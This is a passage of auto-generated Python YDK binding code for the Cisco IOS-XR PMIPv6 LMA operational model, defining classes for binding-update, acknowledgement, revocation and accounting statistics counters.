**type**\: :py:class:`PbuReceiveStatistics <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_mobileip_oper.Pmipv6.Lma.Statistics.CustomerStatistics.CustomerStatistic.ProtocolStatistics.PbuReceiveStatistics>`
.. attribute:: pba_send_statistics
PBA Send Statistics
**type**\: :py:class:`PbaSendStatistics <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_mobileip_oper.Pmipv6.Lma.Statistics.CustomerStatistics.CustomerStatistic.ProtocolStatistics.PbaSendStatistics>`
.. attribute:: pbri_send_statistics
PBRI Send Statistics
**type**\: :py:class:`PbriSendStatistics <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_mobileip_oper.Pmipv6.Lma.Statistics.CustomerStatistics.CustomerStatistic.ProtocolStatistics.PbriSendStatistics>`
.. attribute:: pbri_receive_statistics
PBRI Receive Statistics
**type**\: :py:class:`PbriReceiveStatistics <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_mobileip_oper.Pmipv6.Lma.Statistics.CustomerStatistics.CustomerStatistic.ProtocolStatistics.PbriReceiveStatistics>`
.. attribute:: pbra_send_statistics
PBRA Send Statistics
**type**\: :py:class:`PbraSendStatistics <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_mobileip_oper.Pmipv6.Lma.Statistics.CustomerStatistics.CustomerStatistic.ProtocolStatistics.PbraSendStatistics>`
.. attribute:: pbra_receive_statistics
PBRA Receive Statistics
**type**\: :py:class:`PbraReceiveStatistics <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_mobileip_oper.Pmipv6.Lma.Statistics.CustomerStatistics.CustomerStatistic.ProtocolStatistics.PbraReceiveStatistics>`
"""
_prefix = 'ip-mobileip-oper'
_revision = '2016-03-10'
def __init__(self):
super(Pmipv6.Lma.Statistics.CustomerStatistics.CustomerStatistic.ProtocolStatistics, self).__init__()
self.yang_name = "protocol-statistics"
self.yang_parent_name = "customer-statistic"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("pbu-receive-statistics", ("pbu_receive_statistics", Pmipv6.Lma.Statistics.CustomerStatistics.CustomerStatistic.ProtocolStatistics.PbuReceiveStatistics)), ("pba-send-statistics", ("pba_send_statistics", Pmipv6.Lma.Statistics.CustomerStatistics.CustomerStatistic.ProtocolStatistics.PbaSendStatistics)), ("pbri-send-statistics", ("pbri_send_statistics", Pmipv6.Lma.Statistics.CustomerStatistics.CustomerStatistic.ProtocolStatistics.PbriSendStatistics)), ("pbri-receive-statistics", ("pbri_receive_statistics", Pmipv6.Lma.Statistics.CustomerStatistics.CustomerStatistic.ProtocolStatistics.PbriReceiveStatistics)), ("pbra-send-statistics", ("pbra_send_statistics", Pmipv6.Lma.Statistics.CustomerStatistics.CustomerStatistic.ProtocolStatistics.PbraSendStatistics)), ("pbra-receive-statistics", ("pbra_receive_statistics", Pmipv6.Lma.Statistics.CustomerStatistics.CustomerStatistic.ProtocolStatistics.PbraReceiveStatistics))])
self._leafs = OrderedDict()
self.pbu_receive_statistics = Pmipv6.Lma.Statistics.CustomerStatistics.CustomerStatistic.ProtocolStatistics.PbuReceiveStatistics()
self.pbu_receive_statistics.parent = self
self._children_name_map["pbu_receive_statistics"] = "pbu-receive-statistics"
self.pba_send_statistics = Pmipv6.Lma.Statistics.CustomerStatistics.CustomerStatistic.ProtocolStatistics.PbaSendStatistics()
self.pba_send_statistics.parent = self
self._children_name_map["pba_send_statistics"] = "pba-send-statistics"
self.pbri_send_statistics = Pmipv6.Lma.Statistics.CustomerStatistics.CustomerStatistic.ProtocolStatistics.PbriSendStatistics()
self.pbri_send_statistics.parent = self
self._children_name_map["pbri_send_statistics"] = "pbri-send-statistics"
self.pbri_receive_statistics = Pmipv6.Lma.Statistics.CustomerStatistics.CustomerStatistic.ProtocolStatistics.PbriReceiveStatistics()
self.pbri_receive_statistics.parent = self
self._children_name_map["pbri_receive_statistics"] = "pbri-receive-statistics"
self.pbra_send_statistics = Pmipv6.Lma.Statistics.CustomerStatistics.CustomerStatistic.ProtocolStatistics.PbraSendStatistics()
self.pbra_send_statistics.parent = self
self._children_name_map["pbra_send_statistics"] = "pbra-send-statistics"
self.pbra_receive_statistics = Pmipv6.Lma.Statistics.CustomerStatistics.CustomerStatistic.ProtocolStatistics.PbraReceiveStatistics()
self.pbra_receive_statistics.parent = self
self._children_name_map["pbra_receive_statistics"] = "pbra-receive-statistics"
self._segment_path = lambda: "protocol-statistics"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Pmipv6.Lma.Statistics.CustomerStatistics.CustomerStatistic.ProtocolStatistics, [], name, value)
class PbuReceiveStatistics(Entity):
"""
PBU Receive Statistics
.. attribute:: pbu_count
Count of PBUs
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: pbu_drop_count
Count of PBUs Dropped
**type**\: int
**range:** 0..4294967295
"""
_prefix = 'ip-mobileip-oper'
_revision = '2016-03-10'
def __init__(self):
super(Pmipv6.Lma.Statistics.CustomerStatistics.CustomerStatistic.ProtocolStatistics.PbuReceiveStatistics, self).__init__()
self.yang_name = "pbu-receive-statistics"
self.yang_parent_name = "protocol-statistics"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('pbu_count', (YLeaf(YType.uint64, 'pbu-count'), ['int'])),
('pbu_drop_count', (YLeaf(YType.uint32, 'pbu-drop-count'), ['int'])),
])
self.pbu_count = None
self.pbu_drop_count = None
self._segment_path = lambda: "pbu-receive-statistics"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Pmipv6.Lma.Statistics.CustomerStatistics.CustomerStatistic.ProtocolStatistics.PbuReceiveStatistics, ['pbu_count', 'pbu_drop_count'], name, value)
class PbaSendStatistics(Entity):
"""
PBA Send Statistics
.. attribute:: pba_count
Count of PBAs
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: pba_drop_count
Count of PBAs dropped
**type**\: int
**range:** 0..4294967295
.. attribute:: accepted_count
Count of Status Code \- Binding Update accepted
**type**\: int
**range:** 0..4294967295
.. attribute:: unknown_count
Count of Status Code \- Last BA status code sent
**type**\: int
**range:** 0..4294967295
.. attribute:: unspecified_failure_count
Count of Status Code \- Reason unspecified
**type**\: int
**range:** 0..4294967295
.. attribute:: admin_failure_count
Count of Status Code \- Administratively prohibited
**type**\: int
**range:** 0..4294967295
.. attribute:: resource_failure_count
Count of Status Code \- Insufficient resources
**type**\: int
**range:** 0..4294967295
.. attribute:: home_reg_failure_count
Count of Status Code \- Home registration not supported
**type**\: int
**range:** 0..4294967295
.. attribute:: home_subnet_failure_count
Count of Status Code \- Not home subnet
**type**\: int
**range:** 0..4294967295
.. attribute:: bad_sequence_failure_count
Count of Status Code \- Sequence number out of window
**type**\: int
**range:** 0..4294967295
.. attribute:: reg_type_failure_count
Count of Status Code \- Registration type change
**type**\: int
**range:** 0..4294967295
.. attribute:: authen_failure_count
Count of Status Code \- Auth Fail
**type**\: int
**range:** 0..4294967295
.. attribute:: proxy_reg_not_enabled_count
Count of Status Code \- Proxy Registration not enabled
**type**\: int
**range:** 0..4294967295
.. attribute:: not_lma_for_this_mn_count
Count of Status Code \- Not LMA for this Mobile Node
**type**\: int
**range:** 0..4294967295
.. attribute:: no_author_for_proxy_reg_count
Count of Status Code \- MAG not auth.for proxyreg
**type**\: int
**range:** 0..4294967295
.. attribute:: no_author_for_hnp_count
Count of Status Code \- Not authorized for HNP
**type**\: int
**range:** 0..4294967295
.. attribute:: timestamp_mismatch_count
Count of Status Code \- Invalid timestamp value
**type**\: int
**range:** 0..4294967295
.. attribute:: timestamp_lower_than_previous_accepted_count
Count of Status Code \- Timestamp lower than previous accepted
**type**\: int
**range:** 0..4294967295
.. attribute:: missing_hnp_opt_count
Count of Status Code \- Missing Home Network Prefix option
**type**\: int
**range:** 0..4294967295
.. attribute:: received_hnps_do_not_match_bce_hnps_count
Count of Status Code \- Recevied HNPs do not match with BCE
**type**\: int
**range:** 0..4294967295
.. attribute:: missing_mn_id_opt_count
Count of Status Code \- Missing MN identifier option
**type**\: int
**range:** 0..4294967295
.. attribute:: missing_hi_opt_count
Count of Status Code \- Missing Handoff Indicator
**type**\: int
**range:** 0..4294967295
.. attribute:: missing_access_tech_type_opt_count
Count of Status Code \- Missing ATT option
**type**\: int
**range:** 0..4294967295
.. attribute:: no_author_for_ipv4_mobility_count
Count of Status Code \- Not authorized for IPv4 mobility
**type**\: int
**range:** 0..4294967295
.. attribute:: no_author_for_ipv4_hoa_count
Count of Status Code \- Not authorized for IPv4 HoA
**type**\: int
**range:** 0..4294967295
.. attribute:: no_author_for_ipv6_mobility_count
Count of Status Code \- Not authorized for IPv6 mobility
**type**\: int
**range:** 0..4294967295
.. attribute:: multiple_ipv4_ho_a_not_supported_count
Count of Status Code \- Multiple IPv4 HoA not supported
**type**\: int
**range:** 0..4294967295
.. attribute:: gre_key_opt_required_count
Count of Status Code \- GRE Key option is required
**type**\: int
**range:** 0..4294967295
"""
_prefix = 'ip-mobileip-oper'
_revision = '2016-03-10'
def __init__(self):
super(Pmipv6.Lma.Statistics.CustomerStatistics.CustomerStatistic.ProtocolStatistics.PbaSendStatistics, self).__init__()
self.yang_name = "pba-send-statistics"
self.yang_parent_name = "protocol-statistics"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('pba_count', (YLeaf(YType.uint64, 'pba-count'), ['int'])),
('pba_drop_count', (YLeaf(YType.uint32, 'pba-drop-count'), ['int'])),
('accepted_count', (YLeaf(YType.uint32, 'accepted-count'), ['int'])),
('unknown_count', (YLeaf(YType.uint32, 'unknown-count'), ['int'])),
('unspecified_failure_count', (YLeaf(YType.uint32, 'unspecified-failure-count'), ['int'])),
('admin_failure_count', (YLeaf(YType.uint32, 'admin-failure-count'), ['int'])),
('resource_failure_count', (YLeaf(YType.uint32, 'resource-failure-count'), ['int'])),
('home_reg_failure_count', (YLeaf(YType.uint32, 'home-reg-failure-count'), ['int'])),
('home_subnet_failure_count', (YLeaf(YType.uint32, 'home-subnet-failure-count'), ['int'])),
('bad_sequence_failure_count', (YLeaf(YType.uint32, 'bad-sequence-failure-count'), ['int'])),
('reg_type_failure_count', (YLeaf(YType.uint32, 'reg-type-failure-count'), ['int'])),
('authen_failure_count', (YLeaf(YType.uint32, 'authen-failure-count'), ['int'])),
('proxy_reg_not_enabled_count', (YLeaf(YType.uint32, 'proxy-reg-not-enabled-count'), ['int'])),
('not_lma_for_this_mn_count', (YLeaf(YType.uint32, 'not-lma-for-this-mn-count'), ['int'])),
('no_author_for_proxy_reg_count', (YLeaf(YType.uint32, 'no-author-for-proxy-reg-count'), ['int'])),
('no_author_for_hnp_count', (YLeaf(YType.uint32, 'no-author-for-hnp-count'), ['int'])),
('timestamp_mismatch_count', (YLeaf(YType.uint32, 'timestamp-mismatch-count'), ['int'])),
('timestamp_lower_than_previous_accepted_count', (YLeaf(YType.uint32, 'timestamp-lower-than-previous-accepted-count'), ['int'])),
('missing_hnp_opt_count', (YLeaf(YType.uint32, 'missing-hnp-opt-count'), ['int'])),
('received_hnps_do_not_match_bce_hnps_count', (YLeaf(YType.uint32, 'received-hnps-do-not-match-bce-hnps-count'), ['int'])),
('missing_mn_id_opt_count', (YLeaf(YType.uint32, 'missing-mn-id-opt-count'), ['int'])),
('missing_hi_opt_count', (YLeaf(YType.uint32, 'missing-hi-opt-count'), ['int'])),
('missing_access_tech_type_opt_count', (YLeaf(YType.uint32, 'missing-access-tech-type-opt-count'), ['int'])),
('no_author_for_ipv4_mobility_count', (YLeaf(YType.uint32, 'no-author-for-ipv4-mobility-count'), ['int'])),
('no_author_for_ipv4_hoa_count', (YLeaf(YType.uint32, 'no-author-for-ipv4-hoa-count'), ['int'])),
('no_author_for_ipv6_mobility_count', (YLeaf(YType.uint32, 'no-author-for-ipv6-mobility-count'), ['int'])),
('multiple_ipv4_ho_a_not_supported_count', (YLeaf(YType.uint32, 'multiple-ipv4-ho-a-not-supported-count'), ['int'])),
('gre_key_opt_required_count', (YLeaf(YType.uint32, 'gre-key-opt-required-count'), ['int'])),
])
self.pba_count = None
self.pba_drop_count = None
self.accepted_count = None
self.unknown_count = None
self.unspecified_failure_count = None
self.admin_failure_count = None
self.resource_failure_count = None
self.home_reg_failure_count = None
self.home_subnet_failure_count = None
self.bad_sequence_failure_count = None
self.reg_type_failure_count = None
self.authen_failure_count = None
self.proxy_reg_not_enabled_count = None
self.not_lma_for_this_mn_count = None
self.no_author_for_proxy_reg_count = None
self.no_author_for_hnp_count = None
self.timestamp_mismatch_count = None
self.timestamp_lower_than_previous_accepted_count = None
self.missing_hnp_opt_count = None
self.received_hnps_do_not_match_bce_hnps_count = None
self.missing_mn_id_opt_count = None
self.missing_hi_opt_count = None
self.missing_access_tech_type_opt_count = None
self.no_author_for_ipv4_mobility_count = None
self.no_author_for_ipv4_hoa_count = None
self.no_author_for_ipv6_mobility_count = None
self.multiple_ipv4_ho_a_not_supported_count = None
self.gre_key_opt_required_count = None
self._segment_path = lambda: "pba-send-statistics"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Pmipv6.Lma.Statistics.CustomerStatistics.CustomerStatistic.ProtocolStatistics.PbaSendStatistics, ['pba_count', 'pba_drop_count', 'accepted_count', 'unknown_count', 'unspecified_failure_count', 'admin_failure_count', 'resource_failure_count', 'home_reg_failure_count', 'home_subnet_failure_count', 'bad_sequence_failure_count', 'reg_type_failure_count', 'authen_failure_count', 'proxy_reg_not_enabled_count', 'not_lma_for_this_mn_count', 'no_author_for_proxy_reg_count', 'no_author_for_hnp_count', 'timestamp_mismatch_count', 'timestamp_lower_than_previous_accepted_count', 'missing_hnp_opt_count', 'received_hnps_do_not_match_bce_hnps_count', 'missing_mn_id_opt_count', 'missing_hi_opt_count', 'missing_access_tech_type_opt_count', 'no_author_for_ipv4_mobility_count', 'no_author_for_ipv4_hoa_count', 'no_author_for_ipv6_mobility_count', 'multiple_ipv4_ho_a_not_supported_count', 'gre_key_opt_required_count'], name, value)
class PbriSendStatistics(Entity):
"""
PBRI Send Statistics
.. attribute:: pbri_count
Count of PBRIs
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: pbri_drop_count
Count of PBRIs dropped
**type**\: int
**range:** 0..4294967295
.. attribute:: unspecified_count
Count of Revoc Trigger \- Unspecified
**type**\: int
**range:** 0..4294967295
.. attribute:: admin_reason_count
Count of Revoc Trigger \- Administrative Reason
**type**\: int
**range:** 0..4294967295
.. attribute:: mag_handover_same_att_count
Count of Revoc Trigger \- Inter MAG Handover Same ATT
**type**\: int
**range:** 0..4294967295
.. attribute:: mag_handover_different_att_count
Count of Revoc Trigger \- Inter MAG Handover Different ATT
**type**\: int
**range:** 0..4294967295
.. attribute:: mag_handover_unknown_count
Count of Revoc Trigger \- Inter MAG Handover Unknown
**type**\: int
**range:** 0..4294967295
.. attribute:: user_session_termination_count
Count of Revoc Trigger \- User Init Session Terminatation
**type**\: int
**range:** 0..4294967295
.. attribute:: network_session_termination_count
Count of Revoc Trigger \- Access Network Session Termination
**type**\: int
**range:** 0..4294967295
.. attribute:: out_of_sync_bce_state_count
Count of Revoc Trigger \- Possible Out\-of\-Sync BCE State
**type**\: int
**range:** 0..4294967295
.. attribute:: per_peer_policy_count
Count of Revoc Trigger \- Per\-Peer Policy
**type**\: int
**range:** 0..4294967295
.. attribute:: revoking_mn_local_policy_count
Count of Revoc Trigger \- Revoking Mobility Node Local Policy
**type**\: int
**range:** 0..4294967295
"""
_prefix = 'ip-mobileip-oper'
_revision = '2016-03-10'
def __init__(self):
super(Pmipv6.Lma.Statistics.CustomerStatistics.CustomerStatistic.ProtocolStatistics.PbriSendStatistics, self).__init__()
self.yang_name = "pbri-send-statistics"
self.yang_parent_name = "protocol-statistics"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('pbri_count', (YLeaf(YType.uint64, 'pbri-count'), ['int'])),
('pbri_drop_count', (YLeaf(YType.uint32, 'pbri-drop-count'), ['int'])),
('unspecified_count', (YLeaf(YType.uint32, 'unspecified-count'), ['int'])),
('admin_reason_count', (YLeaf(YType.uint32, 'admin-reason-count'), ['int'])),
('mag_handover_same_att_count', (YLeaf(YType.uint32, 'mag-handover-same-att-count'), ['int'])),
('mag_handover_different_att_count', (YLeaf(YType.uint32, 'mag-handover-different-att-count'), ['int'])),
('mag_handover_unknown_count', (YLeaf(YType.uint32, 'mag-handover-unknown-count'), ['int'])),
('user_session_termination_count', (YLeaf(YType.uint32, 'user-session-termination-count'), ['int'])),
('network_session_termination_count', (YLeaf(YType.uint32, 'network-session-termination-count'), ['int'])),
('out_of_sync_bce_state_count', (YLeaf(YType.uint32, 'out-of-sync-bce-state-count'), ['int'])),
('per_peer_policy_count', (YLeaf(YType.uint32, 'per-peer-policy-count'), ['int'])),
('revoking_mn_local_policy_count', (YLeaf(YType.uint32, 'revoking-mn-local-policy-count'), ['int'])),
])
self.pbri_count = None
self.pbri_drop_count = None
self.unspecified_count = None
self.admin_reason_count = None
self.mag_handover_same_att_count = None
self.mag_handover_different_att_count = None
self.mag_handover_unknown_count = None
self.user_session_termination_count = None
self.network_session_termination_count = None
self.out_of_sync_bce_state_count = None
self.per_peer_policy_count = None
self.revoking_mn_local_policy_count = None
self._segment_path = lambda: "pbri-send-statistics"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Pmipv6.Lma.Statistics.CustomerStatistics.CustomerStatistic.ProtocolStatistics.PbriSendStatistics, ['pbri_count', 'pbri_drop_count', 'unspecified_count', 'admin_reason_count', 'mag_handover_same_att_count', 'mag_handover_different_att_count', 'mag_handover_unknown_count', 'user_session_termination_count', 'network_session_termination_count', 'out_of_sync_bce_state_count', 'per_peer_policy_count', 'revoking_mn_local_policy_count'], name, value)
class PbriReceiveStatistics(Entity):
"""
PBRI Receive Statistics
.. attribute:: pbri_count
Count of PBRIs
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: pbri_drop_count
Count of PBRIs dropped
**type**\: int
**range:** 0..4294967295
.. attribute:: unspecified_count
Count of Revoc Trigger \- Unspecified
**type**\: int
**range:** 0..4294967295
.. attribute:: admin_reason_count
Count of Revoc Trigger \- Administrative Reason
**type**\: int
**range:** 0..4294967295
.. attribute:: mag_handover_same_att_count
Count of Revoc Trigger \- Inter MAG Handover Same ATT
**type**\: int
**range:** 0..4294967295
.. attribute:: mag_handover_different_att_count
Count of Revoc Trigger \- Inter MAG Handover Different ATT
**type**\: int
**range:** 0..4294967295
.. attribute:: mag_handover_unknown_count
Count of Revoc Trigger \- Inter MAG Handover Unknown
**type**\: int
**range:** 0..4294967295
.. attribute:: user_session_termination_count
Count of Revoc Trigger \- User Init Session Terminatation
**type**\: int
**range:** 0..4294967295
.. attribute:: network_session_termination_count
Count of Revoc Trigger \- Access Network Session Termination
**type**\: int
**range:** 0..4294967295
.. attribute:: out_of_sync_bce_state_count
Count of Revoc Trigger \- Possible Out\-of\-Sync BCE State
**type**\: int
**range:** 0..4294967295
.. attribute:: per_peer_policy_count
Count of Revoc Trigger \- Per\-Peer Policy
**type**\: int
**range:** 0..4294967295
.. attribute:: revoking_mn_local_policy_count
Count of Revoc Trigger \- Revoking Mobility Node Local Policy
**type**\: int
**range:** 0..4294967295
"""
_prefix = 'ip-mobileip-oper'
_revision = '2016-03-10'
def __init__(self):
super(Pmipv6.Lma.Statistics.CustomerStatistics.CustomerStatistic.ProtocolStatistics.PbriReceiveStatistics, self).__init__()
self.yang_name = "pbri-receive-statistics"
self.yang_parent_name = "protocol-statistics"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('pbri_count', (YLeaf(YType.uint64, 'pbri-count'), ['int'])),
('pbri_drop_count', (YLeaf(YType.uint32, 'pbri-drop-count'), ['int'])),
('unspecified_count', (YLeaf(YType.uint32, 'unspecified-count'), ['int'])),
('admin_reason_count', (YLeaf(YType.uint32, 'admin-reason-count'), ['int'])),
('mag_handover_same_att_count', (YLeaf(YType.uint32, 'mag-handover-same-att-count'), ['int'])),
('mag_handover_different_att_count', (YLeaf(YType.uint32, 'mag-handover-different-att-count'), ['int'])),
('mag_handover_unknown_count', (YLeaf(YType.uint32, 'mag-handover-unknown-count'), ['int'])),
('user_session_termination_count', (YLeaf(YType.uint32, 'user-session-termination-count'), ['int'])),
('network_session_termination_count', (YLeaf(YType.uint32, 'network-session-termination-count'), ['int'])),
('out_of_sync_bce_state_count', (YLeaf(YType.uint32, 'out-of-sync-bce-state-count'), ['int'])),
('per_peer_policy_count', (YLeaf(YType.uint32, 'per-peer-policy-count'), ['int'])),
('revoking_mn_local_policy_count', (YLeaf(YType.uint32, 'revoking-mn-local-policy-count'), ['int'])),
])
self.pbri_count = None
self.pbri_drop_count = None
self.unspecified_count = None
self.admin_reason_count = None
self.mag_handover_same_att_count = None
self.mag_handover_different_att_count = None
self.mag_handover_unknown_count = None
self.user_session_termination_count = None
self.network_session_termination_count = None
self.out_of_sync_bce_state_count = None
self.per_peer_policy_count = None
self.revoking_mn_local_policy_count = None
self._segment_path = lambda: "pbri-receive-statistics"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Pmipv6.Lma.Statistics.CustomerStatistics.CustomerStatistic.ProtocolStatistics.PbriReceiveStatistics, ['pbri_count', 'pbri_drop_count', 'unspecified_count', 'admin_reason_count', 'mag_handover_same_att_count', 'mag_handover_different_att_count', 'mag_handover_unknown_count', 'user_session_termination_count', 'network_session_termination_count', 'out_of_sync_bce_state_count', 'per_peer_policy_count', 'revoking_mn_local_policy_count'], name, value)
class PbraSendStatistics(Entity):
"""
PBRA Send Statistics
.. attribute:: pbra_count
Count of PBRAs
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: pbra_drop_count
Count of PBRAs dropped
**type**\: int
**range:** 0..4294967295
.. attribute:: success_count
Count of Revoc Status \- Success
**type**\: int
**range:** 0..4294967295
.. attribute:: partial_success_count
Count of Revoc Status \- Partial Success
**type**\: int
**range:** 0..4294967295
.. attribute:: no_binding_count
Count of Revoc Status \- Binding Does Not Exist
**type**\: int
**range:** 0..4294967295
.. attribute:: hoa_required_count
Count of Revoc Status \- IPv4 Home Address Option Required
**type**\: int
**range:** 0..4294967295
.. attribute:: no_author_for_global_revoc_count
Count of Revoc Status \- Global Revocation NOT Authorized
**type**\: int
**range:** 0..4294967295
.. attribute:: mn_identity_required_count
Count of Revoc Status \- Revoked Mobile Node Identity Required
**type**\: int
**range:** 0..4294967295
.. attribute:: mn_attached_count
Count of Revoc Status \- Revocation Failed \- MN is Attached
**type**\: int
**range:** 0..4294967295
.. attribute:: unknown_revoc_trigger_count
Count of Revoc Status \- Revocation Trigger NOT supported
**type**\: int
**range:** 0..4294967295
.. attribute:: revoc_function_not_supported_count
Count of Revoc Status \- Revocation Function NOT Supported
**type**\: int
**range:** 0..4294967295
.. attribute:: pbr_not_supported_count
Count of Revoc Status \- Proxy Binding Revocation NOT Supported
**type**\: int
**range:** 0..4294967295
"""
_prefix = 'ip-mobileip-oper'
_revision = '2016-03-10'
def __init__(self):
super(Pmipv6.Lma.Statistics.CustomerStatistics.CustomerStatistic.ProtocolStatistics.PbraSendStatistics, self).__init__()
self.yang_name = "pbra-send-statistics"
self.yang_parent_name = "protocol-statistics"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('pbra_count', (YLeaf(YType.uint64, 'pbra-count'), ['int'])),
('pbra_drop_count', (YLeaf(YType.uint32, 'pbra-drop-count'), ['int'])),
('success_count', (YLeaf(YType.uint32, 'success-count'), ['int'])),
('partial_success_count', (YLeaf(YType.uint32, 'partial-success-count'), ['int'])),
('no_binding_count', (YLeaf(YType.uint32, 'no-binding-count'), ['int'])),
('hoa_required_count', (YLeaf(YType.uint32, 'hoa-required-count'), ['int'])),
('no_author_for_global_revoc_count', (YLeaf(YType.uint32, 'no-author-for-global-revoc-count'), ['int'])),
('mn_identity_required_count', (YLeaf(YType.uint32, 'mn-identity-required-count'), ['int'])),
('mn_attached_count', (YLeaf(YType.uint32, 'mn-attached-count'), ['int'])),
('unknown_revoc_trigger_count', (YLeaf(YType.uint32, 'unknown-revoc-trigger-count'), ['int'])),
('revoc_function_not_supported_count', (YLeaf(YType.uint32, 'revoc-function-not-supported-count'), ['int'])),
('pbr_not_supported_count', (YLeaf(YType.uint32, 'pbr-not-supported-count'), ['int'])),
])
self.pbra_count = None
self.pbra_drop_count = None
self.success_count = None
self.partial_success_count = None
self.no_binding_count = None
self.hoa_required_count = None
self.no_author_for_global_revoc_count = None
self.mn_identity_required_count = None
self.mn_attached_count = None
self.unknown_revoc_trigger_count = None
self.revoc_function_not_supported_count = None
self.pbr_not_supported_count = None
self._segment_path = lambda: "pbra-send-statistics"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Pmipv6.Lma.Statistics.CustomerStatistics.CustomerStatistic.ProtocolStatistics.PbraSendStatistics, ['pbra_count', 'pbra_drop_count', 'success_count', 'partial_success_count', 'no_binding_count', 'hoa_required_count', 'no_author_for_global_revoc_count', 'mn_identity_required_count', 'mn_attached_count', 'unknown_revoc_trigger_count', 'revoc_function_not_supported_count', 'pbr_not_supported_count'], name, value)
class PbraReceiveStatistics(Entity):
"""
PBRA Receive Statistics
.. attribute:: pbra_count
Count of PBRAs
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: pbra_drop_count
Count of PBRAs dropped
**type**\: int
**range:** 0..4294967295
.. attribute:: success_count
Count of Revoc Status \- Success
**type**\: int
**range:** 0..4294967295
.. attribute:: partial_success_count
Count of Revoc Status \- Partial Success
**type**\: int
**range:** 0..4294967295
.. attribute:: no_binding_count
Count of Revoc Status \- Binding Does Not Exist
**type**\: int
**range:** 0..4294967295
.. attribute:: hoa_required_count
Count of Revoc Status \- IPv4 Home Address Option Required
**type**\: int
**range:** 0..4294967295
.. attribute:: no_author_for_global_revoc_count
Count of Revoc Status \- Global Revocation NOT Authorized
**type**\: int
**range:** 0..4294967295
.. attribute:: mn_identity_required_count
Count of Revoc Status \- Revoked Mobile Node Identity Required
**type**\: int
**range:** 0..4294967295
.. attribute:: mn_attached_count
Count of Revoc Status \- Revocation Failed \- MN is Attached
**type**\: int
**range:** 0..4294967295
.. attribute:: unknown_revoc_trigger_count
Count of Revoc Status \- Revocation Trigger NOT supported
**type**\: int
**range:** 0..4294967295
.. attribute:: revoc_function_not_supported_count
Count of Revoc Status \- Revocation Function NOT Supported
**type**\: int
**range:** 0..4294967295
.. attribute:: pbr_not_supported_count
Count of Revoc Status \- Proxy Binding Revocation NOT Supported
**type**\: int
**range:** 0..4294967295
"""
_prefix = 'ip-mobileip-oper'
_revision = '2016-03-10'
def __init__(self):
super(Pmipv6.Lma.Statistics.CustomerStatistics.CustomerStatistic.ProtocolStatistics.PbraReceiveStatistics, self).__init__()
self.yang_name = "pbra-receive-statistics"
self.yang_parent_name = "protocol-statistics"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('pbra_count', (YLeaf(YType.uint64, 'pbra-count'), ['int'])),
('pbra_drop_count', (YLeaf(YType.uint32, 'pbra-drop-count'), ['int'])),
('success_count', (YLeaf(YType.uint32, 'success-count'), ['int'])),
('partial_success_count', (YLeaf(YType.uint32, 'partial-success-count'), ['int'])),
('no_binding_count', (YLeaf(YType.uint32, 'no-binding-count'), ['int'])),
('hoa_required_count', (YLeaf(YType.uint32, 'hoa-required-count'), ['int'])),
('no_author_for_global_revoc_count', (YLeaf(YType.uint32, 'no-author-for-global-revoc-count'), ['int'])),
('mn_identity_required_count', (YLeaf(YType.uint32, 'mn-identity-required-count'), ['int'])),
('mn_attached_count', (YLeaf(YType.uint32, 'mn-attached-count'), ['int'])),
('unknown_revoc_trigger_count', (YLeaf(YType.uint32, 'unknown-revoc-trigger-count'), ['int'])),
('revoc_function_not_supported_count', (YLeaf(YType.uint32, 'revoc-function-not-supported-count'), ['int'])),
('pbr_not_supported_count', (YLeaf(YType.uint32, 'pbr-not-supported-count'), ['int'])),
])
self.pbra_count = None
self.pbra_drop_count = None
self.success_count = None
self.partial_success_count = None
self.no_binding_count = None
self.hoa_required_count = None
self.no_author_for_global_revoc_count = None
self.mn_identity_required_count = None
self.mn_attached_count = None
self.unknown_revoc_trigger_count = None
self.revoc_function_not_supported_count = None
self.pbr_not_supported_count = None
self._segment_path = lambda: "pbra-receive-statistics"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Pmipv6.Lma.Statistics.CustomerStatistics.CustomerStatistic.ProtocolStatistics.PbraReceiveStatistics, ['pbra_count', 'pbra_drop_count', 'success_count', 'partial_success_count', 'no_binding_count', 'hoa_required_count', 'no_author_for_global_revoc_count', 'mn_identity_required_count', 'mn_attached_count', 'unknown_revoc_trigger_count', 'revoc_function_not_supported_count', 'pbr_not_supported_count'], name, value)
class AccountingStatistics(Entity):
"""
LMA Accounting Statistics
.. attribute:: accounting_start_sent_count
Count of Accounting Start Records Sent
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: accounting_update_sent_count
Count of Accounting Update Records Sent
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: accounting_stop_sent_count
Count of Accounting Stop Records Sent
**type**\: int
**range:** 0..18446744073709551615
"""
_prefix = 'ip-mobileip-oper'
_revision = '2016-03-10'
def __init__(self):
